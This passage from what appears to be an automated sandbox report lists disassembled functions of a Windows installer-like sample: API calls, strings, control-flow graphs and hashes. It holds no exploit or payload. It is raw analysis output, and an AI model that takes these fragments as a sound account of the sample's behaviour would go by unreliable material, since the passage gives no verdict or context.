                                                                                        • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                                      • GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
                                                                                      • RegisterClassA.USER32(00494630), ref: 00423827
                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00423849
                                                                                      • GetSystemMetrics.USER32(00000001), ref: 00423858
                                                                                      • SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
                                                                                      • SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
                                                                                      • GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                      • String ID: 5B
                                                                                      • API String ID: 183575631-3738334870
                                                                                      • Opcode ID: e5b5147e0e34996107640ab488c5a955b3283bc40e3e9afea641ea9dff5fb6f0
                                                                                      • Instruction ID: 4eea79998965153292ad411f177aff7c9d901da1d54039d3c3496ec011b6d66c
                                                                                      • Opcode Fuzzy Hash: e5b5147e0e34996107640ab488c5a955b3283bc40e3e9afea641ea9dff5fb6f0
                                                                                      • Instruction Fuzzy Hash: C53161B17402106AEB10AF65EC82F6A36989715709F11017BBA41AF2D7C67DED04876C
                                                                                      Function 00477ECC Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1857 477ecc-477f22 call 42c36c call 4035c0 call 477b48 call 4511e0 1866 477f24-477f29 call 451f4c 1857->1866 1867 477f2e-477f3d call 4511e0 1857->1867 1866->1867 1871 477f57-477f5d 1867->1871 1872 477f3f-477f45 1867->1872 1875 477f74-477f9c call 42e1f0 * 2 1871->1875 1876 477f5f-477f65 1871->1876 1873 477f67-477f6f call 403494 1872->1873 1874 477f47-477f4d 1872->1874 1873->1875 1874->1871 1879 477f4f-477f55 1874->1879 1883 477fc3-477fdd GetProcAddress 1875->1883 1884 477f9e-477fbe call 40785c call 451f4c 1875->1884 1876->1873 1876->1875 1879->1871 1879->1873 1886 477fdf-477fe4 call 451f4c 1883->1886 1887 477fe9-478006 call 403400 * 2 1883->1887 1884->1883 1886->1887
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(6E380000,SHGetFolderPathA), ref: 00477FCE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$] I$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                      • API String ID: 190572456-953201679
                                                                                      • Opcode ID: 39e346f91b0b191ca7c9d4b76c1215527ff936a439ab04cc6e1b4ee361ca35d9
                                                                                      • Instruction ID: be8cea5b208f70f3497dc675e9b67cc11d28b3b7ca4846f22d5268085fe32373
                                                                                      • Opcode Fuzzy Hash: 39e346f91b0b191ca7c9d4b76c1215527ff936a439ab04cc6e1b4ee361ca35d9
                                                                                      • Instruction Fuzzy Hash: D5312530A04249DBCB00EB95D9859DEB7B4EB54308F51C87BE508E7351DB789E08CBAD
                                                                                      Function 00477BA0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 108COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00477D13,?,?,00000000,00496628,00000000,00000000,?,00492BF5,00000000,00492D9E,?,00000000), ref: 00477C33
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00477D13,?,?,00000000,00496628,00000000,00000000,?,00492BF5,00000000,00492D9E,?,00000000), ref: 00477C3C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$e1I$o1I
                                                                                      • API String ID: 1375471231-477672290
                                                                                      • Opcode ID: 4c75ab1de06e94221e890cf111cb2a76886db217d149b9edc6180f5924f9a91e
                                                                                      • Instruction ID: 656792ce42a3b8ee986284f240f9f7d4df8ffa0b35947b5a09b08d7327d2a589
                                                                                      • Opcode Fuzzy Hash: 4c75ab1de06e94221e890cf111cb2a76886db217d149b9edc6180f5924f9a91e
                                                                                      • Instruction Fuzzy Hash: 89412674A042099FCB11EF95D882ADEB7B5EF48309F50857BE81477392D738AE05CB58
                                                                                      Function 0042EF34 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1947 42ef34-42ef3e 1948 42ef40-42ef43 call 402d30 1947->1948 1949 42ef48-42ef85 call 402b30 GetActiveWindow GetFocus call 41ee14 1947->1949 1948->1949 1955 42ef97-42ef9f 1949->1955 1956 42ef87-42ef91 RegisterClassA 1949->1956 1957 42f026-42f042 SetFocus call 403400 1955->1957 1958 42efa5-42efd6 CreateWindowExA 1955->1958 1956->1955 1958->1957 1959 42efd8-42f01c call 4241ec call 403738 CreateWindowExA 1958->1959 1959->1957 1966 42f01e-42f021 ShowWindow 1959->1966 1966->1957
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0042EF63
                                                                                      • GetFocus.USER32 ref: 0042EF6B
                                                                                      • RegisterClassA.USER32(004947AC), ref: 0042EF8C
                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F060,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EFCA
                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F010
                                                                                      • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F021
                                                                                      • SetFocus.USER32(00000000,00000000,0042F043,?,?,?,00000001,00000000,?,00456ACA,00000000,00496628), ref: 0042F028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                      • String ID: (fI$TWindowDisabler-Window
                                                                                      • API String ID: 3167913817-2792019125
                                                                                      • Opcode ID: 8c16546f9a585749c763ac640097901552d234e7c9639c2d0d67cc4ae301c64c
                                                                                      • Instruction ID: 77e24118650528b8c543fe6d0d23e90f8f7024fb04e3d66e63b834f41b798fd0
                                                                                      • Opcode Fuzzy Hash: 8c16546f9a585749c763ac640097901552d234e7c9639c2d0d67cc4ae301c64c
                                                                                      • Instruction Fuzzy Hash: 35219571740710BAE220EF62DD02F1A76A4EB05B04FA2453BF604BB2D2D7BC6D54C6AD
                                                                                      Function 00451DF8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1967 451df8-451e49 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1968 451e54-451e56 1967->1968 1969 451e4b-451e52 1967->1969 1971 451e5a-451e90 call 42e1f0 call 42e670 call 403400 1968->1971 1969->1968 1970 451e58 1969->1970 1970->1971
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E18
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E1E
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E32
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E38
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                      • API String ID: 1646373207-2130885113
                                                                                      • Opcode ID: dad4633167d2715cc0ebda844063a592ad4074400e663550045590e6248a3f3e
                                                                                      • Instruction ID: bff3e1d123b44789eb661b74cfa9bb81be17ee1d1842bcd010c9e5766072ccdb
                                                                                      • Opcode Fuzzy Hash: dad4633167d2715cc0ebda844063a592ad4074400e663550045590e6248a3f3e
                                                                                      • Instruction Fuzzy Hash: E4018470200744AED701AB62AC03B6B3A98D754B5AF91447BFC04A61A3D7BC5D089E2D
                                                                                      Function 0046E048 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 263fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2603 46e048-46e0b7 call 403634 call 451668 2608 46e220-46e227 2603->2608 2609 46e0bd-46e0c8 2603->2609 2610 46e342-46e346 2608->2610 2611 46e22d-46e274 call 403494 call 40357c * 2 call 451668 2608->2611 2612 46e0cb-46e0d3 2609->2612 2616 46e3b7-46e3e6 call 46a414 call 403420 * 2 2610->2616 2617 46e348-46e34f 2610->2617 2611->2610 2655 46e27a-46e285 2611->2655 2613 46e1ea-46e1fc FindNextFileA 2612->2613 2614 46e0d9-46e0dd 2612->2614 2613->2612 2623 46e202-46e218 FindClose 2613->2623 2618 46e0df-46e0e1 2614->2618 2619 46e0fc-46e102 call 403494 2614->2619 2617->2616 2622 46e351-46e355 2617->2622 2618->2613 2624 46e0e7-46e0fa call 40355c 2618->2624 2631 46e107-46e136 call 403634 call 47742c 2619->2631 2622->2616 2628 46e357-46e36c call 47742c 2622->2628 2624->2631 2640 46e36e-46e379 call 40357c 2628->2640 2641 46e37b-46e395 call 42c830 call 4035c0 2628->2641 2656 46e150-46e154 2631->2656 2657 46e138-46e14e call 403634 2631->2657 2653 46e39a-46e3b3 call 46b8b4 2640->2653 2641->2653 2653->2616 2661 46e288-46e295 call 478660 2655->2661 2658 46e156-46e189 call 42c830 call 42c808 call 403634 2656->2658 2659 46e18e-46e1ad call 430560 2656->2659 2657->2659 2658->2659 2672 46e1af-46e1ba 2659->2672 2673 46e1bd-46e1d9 call 46c5c4 2659->2673 2674 46e297-46e309 call 403494 call 40355c call 40357c * 2 call 46e048 2661->2674 2675 46e30c-46e31e FindNextFileA 2661->2675 2672->2673 2682 46e1de-46e1e5 call 430588 2673->2682 2674->2675 2675->2661 2677 46e324-46e33a FindClose 2675->2677 2682->2613
                                                                                      APIs
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0046E219,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2), ref: 0046E1F5
                                                                                      • FindClose.KERNEL32(000000FF,0046E220,0046E219,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2,?), ref: 0046E213
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0046E33B,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2), ref: 0046E317
                                                                                      • FindClose.KERNEL32(000000FF,0046E342,0046E33B,?,00000000,?,00000001,00000000,0046E3E7,?,00000000,?,00000000,?,0046E5A2,?), ref: 0046E335
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileNext
                                                                                      • String ID: IF$sF$sF
                                                                                      • API String ID: 2066263336-2713198477
                                                                                      • Opcode ID: 6a7a0da7ad197dfdba6f926028919c8a572ec1f5835758eec4f6d61e2094463d
                                                                                      • Instruction ID: 1230aeaf309185c7ec03d96dbdc6ad6414d2784c2265a1c5d62d22ef3a6f047c
                                                                                      • Opcode Fuzzy Hash: 6a7a0da7ad197dfdba6f926028919c8a572ec1f5835758eec4f6d61e2094463d
                                                                                      • Instruction Fuzzy Hash: 51B13D3490425D9FCF11DFA6C881ADEBBF9BF49304F5081AAE808A7391D7389A46CF55
                                                                                      Function 00430314 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043031C
                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043032B
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430345
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00430366
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                      • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                      • API String ID: 4130936913-2943970505
                                                                                      • Opcode ID: d957c5322606f91c3a63daffd078634db936568746c689a8806e8aa63a5fc16b
                                                                                      • Instruction ID: 0713c644b5c0c2c8d9555e19a872e1a2a1cf9f6f22ed51b2a28eccd68185566a
                                                                                      • Opcode Fuzzy Hash: d957c5322606f91c3a63daffd078634db936568746c689a8806e8aa63a5fc16b
                                                                                      • Instruction Fuzzy Hash: 9CF082704483808BD700EB75C842B197AE0EB98708F01467FB898A62E1D77A8500CB5F
                                                                                      Function 00453A04 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00453C20,00453C20,00000031,00453C20,00000000), ref: 00453BAC
                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00453C20,00453C20,00000031,00453C20), ref: 00453BB9
                                                                                        • Part of subcall function 00453970: WaitForInputIdle.USER32(00000001,00000032), ref: 0045399C
                                                                                        • Part of subcall function 00453970: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004539BE
                                                                                        • Part of subcall function 00453970: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 004539CD
                                                                                        • Part of subcall function 00453970: CloseHandle.KERNEL32(00000001,004539FA,004539F3,?,00000031,00000080,00000000,?,?,00453D4B,00000080,0000003C,00000000,00453D61), ref: 004539ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                      • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                      • API String ID: 854858120-615399546
                                                                                      • Opcode ID: 969602a1eac1dd91b4af2a32f62313c77e3a40ceb3341a8b7a3818eab434afd5
                                                                                      • Instruction ID: 0d4c244814a61e6a9f40f8d6579175ec88b371b5f0bc4768c512e06936e56e52
                                                                                      • Opcode Fuzzy Hash: 969602a1eac1dd91b4af2a32f62313c77e3a40ceb3341a8b7a3818eab434afd5
                                                                                      • Instruction Fuzzy Hash: 0D51767460035DABCB01EFA5C842B9EBBB9AF44346F50443BB844B7283D7789F098B58
                                                                                      Function 004235FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                                      • OemToCharA.USER32(?,?), ref: 004236CC
                                                                                      • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$FileIconLoadLowerModuleName
                                                                                      • String ID: 2$MAINICON
                                                                                      • API String ID: 3935243913-3181700818
                                                                                      • Opcode ID: b8e4f3de8f6e7962c855b1bbff0a6ea575b20ad32e9f870a500b7efad52da8d9
                                                                                      • Instruction ID: d7f5d394b2ec06d520cb0a4b60bf3498b9d8aa77ab50e693133e7ce4a757069a
                                                                                      • Opcode Fuzzy Hash: b8e4f3de8f6e7962c855b1bbff0a6ea575b20ad32e9f870a500b7efad52da8d9
                                                                                      • Instruction Fuzzy Hash: DC31A2B0A042559ADF10EF29D8C57C67BE8AF14308F4441BAE844DB393D7BED988CB65
                                                                                      Function 00418EA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00418EE9
                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
                                                                                        • Part of subcall function 00423038: 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                                        • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                                        • Part of subcall function 00423038: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                                        • Part of subcall function 00423038: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                                        • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                                        • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                                        • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
                                                                                        • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                                        • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                                        • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                                        • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                                        • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                                        • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                      • API String ID: 3476490787-2767913252
                                                                                      • Opcode ID: 1c5da02b922e4aac06326fd948070b9cb60db65944391413fb0283cc291dbe50
                                                                                      • Instruction ID: b4a2cca2d4326696562d23f03e9beb5cdbbc64ba536a620a3ee3ba5bc66bdef7
                                                                                      • Opcode Fuzzy Hash: 1c5da02b922e4aac06326fd948070b9cb60db65944391413fb0283cc291dbe50
                                                                                      • Instruction Fuzzy Hash: 9A1160B06142409AC700FF2A984274A7AE0EB64309F41843FF448DB2A1DB3D9945CB5E
                                                                                      Function 004135AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004135DF
                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 004135F1
                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 0041361B
                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 00413632
                                                                                      Memory Dump Source
